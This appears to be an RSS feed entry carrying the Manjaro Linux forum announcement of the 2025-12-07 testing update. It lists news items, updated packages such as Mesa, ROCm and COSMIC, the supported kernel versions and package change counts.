<h2><a name="p-812109-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-812109-recent-news-2"></a>Recent News</h2>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-25-0-zetar-released/177008" class="inline-onebox">Manjaro 25.0 Zetar released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.17 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/testing-update-2025-12-07-kernels-cosmic-mesa-rocm-gambas/183459/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2025-12-07-kernels-cosmic-mesa-rocm-gambas/183459/1">(click for more details)</a>
<h2><a name="p-812109-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-812109-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernels</strong></li>
<li><strong>COSMIC</strong> Beta 9</li>
<li><strong>Gambas</strong> <a href="https://gambaswiki.org/wiki/doc/release/3.21.1">3.21.1</a></li>
<li><strong>ROCm</strong> <a href="https://rocm.docs.amd.com/en/latest/about/release-notes.html">7.1.1</a></li>
<li><strong>WebKitGTK</strong> <a href="https://webkitgtk.org/2025/12/04/webkitgtk2.50.3-released.html">2.50.3</a></li>
<li><strong>Mesa</strong> <a href="https://docs.mesa3d.org/relnotes/25.3.1.html">25.3.1</a></li>
<li>initial build of <a href="https://forum.manjaro.org/t/183428" class="inline-onebox">Manjaro Control Panel, 2025</a></li>
</ul>
<h2><a name="p-812109-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-812109-additional-info-4"></a>Additional Info</h2>

Python 3.13 info <a href="https://forum.manjaro.org/t/testing-update-2025-12-07-kernels-cosmic-mesa-rocm-gambas/183459/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2025-12-07-kernels-cosmic-mesa-rocm-gambas/183459/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux54 5.4.302 [EOL]</li>
<li>linux510 5.10.247</li>
<li>linux515 5.15.197</li>
<li>linux61 6.1.159</li>
<li>linux66 6.6.119</li>
<li>linux612 6.12.61</li>
<li>linux617 6.17.11</li>
<li>linux618 6.18.0</li>
<li>linux61-rt 6.1.158_rt58</li>
<li>linux66-rt 6.6.116_rt66</li>
<li>linux612-rt 6.12.57_rt14</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (12/7/25 19:07 CET)</p>
<ul>
<li>testing core x86_64:  38 new and 38 removed package(s)</li>
<li>testing extra x86_64:  1030 new and 1023 removed package(s)</li>
<li>testing multilib x86_64:  22 new and 22 removed package(s)</li>
</ul>
<p>A list of all changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1168/raw">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/testing-update-2025-12-07-kernels-cosmic-mesa-rocm-gambas/183459/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2025-12-07-kernels-cosmic-mesa-rocm-gambas/183459">Read full topic</a></p>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,34ms -->